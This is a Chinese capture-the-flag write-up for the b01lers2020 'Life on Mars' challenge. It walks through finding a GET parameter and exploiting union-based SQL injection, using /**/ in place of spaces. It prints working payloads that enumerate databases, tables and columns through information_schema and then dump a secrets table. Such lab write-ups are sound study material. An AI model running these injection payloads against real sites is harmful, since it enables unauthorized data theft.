[b01lers2020]Life on Mars (难发现的sql注入)

[b01lers2020]Life on Mars

[b01lers2020]Life on Mars (难发现的sql注入)_第1张图片

打开界面以后,查看各种都没有提示,果断扫描目录,但也是没获得什么。

到这里只能burp抓个包看看

[b01lers2020]Life on Mars (难发现的sql注入)_第2张图片 

[b01lers2020]Life on Mars (难发现的sql注入)_第3张图片

 抓包两个界面发现了get传参,考虑是否存在sql注入

[b01lers2020]Life on Mars (难发现的sql注入)_第4张图片

尝试额以后发现只返回了一个1,试一下别的引号闭合

直接union select 1,2#发现出现了回显位

[b01lers2020]Life on Mars (难发现的sql注入)_第5张图片 

这里burp中sql注入不能出现空格,需要用/**/ 或者%20代替

直接进行查询所有的数据库名

search=hesperia_planum/**/union/**/select/**/database(),group_concat(schema_name)/**/from/**/information_schema.schemata#

 [b01lers2020]Life on Mars (难发现的sql注入)_第6张图片

 看一下alien_code数据库

?search=hesperia_planum/**/union/**/select/**/database(),group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema="alien_code"#

[b01lers2020]Life on Mars (难发现的sql注入)_第7张图片

发现code表

?search=hesperia_planum/**/union/**/select/**/database(),group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name="code"#

[b01lers2020]Life on Mars (难发现的sql注入)_第8张图片 

 ?search=hesperia_planum/**/union/**/select/**/group_concat(id),group_concat(code)/**/from/**/alien_code.code#

这里是因为不是当前的数据库,表名前面需要加数据库的前缀

总结:这道题难得不在sql注入,注入没有一点得过滤,最多是绕了个弯在别的数据库的表中,难得是找到sql注入的这个点,一般遇到这种界面就会f12源码查看信息,然后扫目录,最后burp查看一下界面,这种题目一般以xml实体注入较多,这里长个记性。

你可能感兴趣的:(sql注入,数据库,sql)